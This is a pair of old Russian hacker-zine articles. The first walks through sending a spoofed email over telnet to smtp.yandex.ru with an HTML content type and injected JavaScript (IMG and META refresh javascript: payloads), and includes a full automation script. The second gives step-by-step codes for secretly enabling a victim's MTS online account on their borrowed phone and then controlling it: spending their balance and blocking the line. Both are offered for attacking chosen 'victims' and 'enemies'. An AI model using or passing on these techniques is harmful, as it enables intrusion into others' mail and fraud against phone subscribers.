Как побороть Yandex.ru

Дарова, любители побаловаться чужим мылом.

На этот раз мы покопаемся на YANDEX.RU... Катят все способы, что и на MAIL.RU (см. прошлую статью), но не будем повторятся, а возьмемся за дело по новому. Какой прекрасный сервак! На этот раз нашим орудием станет телнет, надеюсь ты с ним знаком :)

Идея такова: мы отсылаем письмо без аттача, с измененным полем Content-Type в сообщении, средствами SMTP протокола. Итак, запускаем telnet, набиваем следующее:

open smtp.yandex.ru 25
helo my_enemy
mail from: <mailto:digitalscream@userline.ru>
rcpt to: <mailto:i_need_this_mail@yandex.ru>
data

Вместо mailto:i_need_this_mail@yandex.ru пропишешь нужное мыло. А теперь и сама замена типа документа (точку надо ввести при завершении ввода тела документа):

Mime-Version: 1.0 Content-Type: TEXT/HTML;
charset=US-ASCII
Subject: Message Possible virus infected :-)

После чего сама мессага сама станет хтмл\'ом. А значит можем прописать скрипты. Тут все намного проще и ты можешь вставить в письмо типичные конструкции. Я выбрал:

<IMG SRC=\"javascript:java_script\" >

Значит продолжаем вводить тело письма:

<IMG SRC=\"javascript:alert(\'I\'m JavaScript!\');\">

.

И наконец:

quit

Но вместо выскакивающего окна ты можешь накодить редирект. Но так сложилось, что в нашей жизни самое главное автоматизация, ведь нервы сдают после n-ой ошибки. И тем более, если ты сделаешь ошибку в письме своей жертве, то твои шансы падают к нулю. Я советую использовать какие-нибудь программы автоматизации. Я использовал Telnet Script Executor, она старенькая, еще под ДОС, но надежная :) Ее скрипт в данном случае бедет выглядеть так:

open smtp.yandex.ru 25
pause 10
transmit \"helo my_enemy^M\"
pause 7
transmit \"mail from: < mailto:digitalscream@userline.ru>^M\"
pause 10
transmit \"rcpt to: < mailto:i_need_this_mail@yandex.ru>^M\"
pause 7
transmit \"data^M\"
pause 10
transmit \"Mime-Version: 1.0^M\"
pause 2
transmit \"Content-Type: TEXT/HTML; charset=US-ASCII^M\"
pause 2
transmit \"
Subject: Message Possible virus infected :-)^M\"
pause 2
transmit \"<IMG SRC=\"javascript:alert(\'I\'m JavaScript!\');\">^M\"
pause 2
transmit \".^M\"
pause 10
close

Сохраняем это дело в файл, например yandex_fuck.dat, а потом запускаем:

TSE -d

Но никто не мешает тебе написать свою прогу, мне по крайней мере хватило этой. Вот еще один интересный способ прописать яву, нашел случайно методом научного тыка:

<META HTTP-EQUIV=\"Refresh\"content=\"4;URL=javascript:alert(\'hello\')\">

или тоже самое используя юникод:

<META HTTP-EQUIV=\"Refresh\"content=\"4;URL=JavaScript:alert(\'hello\')\">

Ну вот на сегодня хватит, по кифирчику и спать :))

P.S.: Достали просить сломать чье-то мыло! Я этим не занимаюсь... Я... я пошел спать :)

Взлом сотового МТС

В этой статьея расскажу как "хакнуть" абонента сотовой сети МТС. Короче, тебе потребуется:

1. Твоя голова.
2. Сотовый телефон (твойи желательно Nokia или Siemens.
3. Сотовый телефон (друга ломака).
4. Компс доступом в интернет (твой или в интернет кафе).

Для начала хочу сказать, что это и не является хакингом вообще, это лишь показывает какие в нашей стране доверчивые люди и какая тупая система интернет сервиса абонента у компании МТС (сравнить даже с системой Би-лайн). Как ты наверно уже знаешь, у компании МТС есть интернет система сервиса абонента (ИССА). При покупке телефона у абонента эта система отключена "по умолчанию". Нам надо сделать так чтобы эта система включилась, а делается это так. Берём у своего недруга телефон, буквально на одну минуту под любым предлогом и набираем следующий номер: 08802445 т.е. включаем ИССА, после того как мы её включили нам надо установить пароль для доступав ИССА, для этого мы звоним по номеру: 088021 и устанавливаем пароль (пароль не должен быть больше 7 цифр) по окончании ввода пароля нажимаем звёздочкуи обрываем вызов. Теперь ты можешь смело входить на сайт компании www.mts.ru под реквизитами ламака и творить с его телефоном всё что угодно, например узнать сколько денег осталосьу него на счету, добавлять ему дополнительные услуги, отсылать себе за его счёт логотипы, мелодиии т.д. вплоть до добровольной блокировки его телефона на какой угодно срок.
Всё работает на 100% проверял сам но только для телефонов которые зарегистрированы (привязаны) к Москвеи Московской области, для других областей не знаю, но если узнаю то обязательно сделаю Update статьи.
Удачи тебе в твоём нелёгком деле!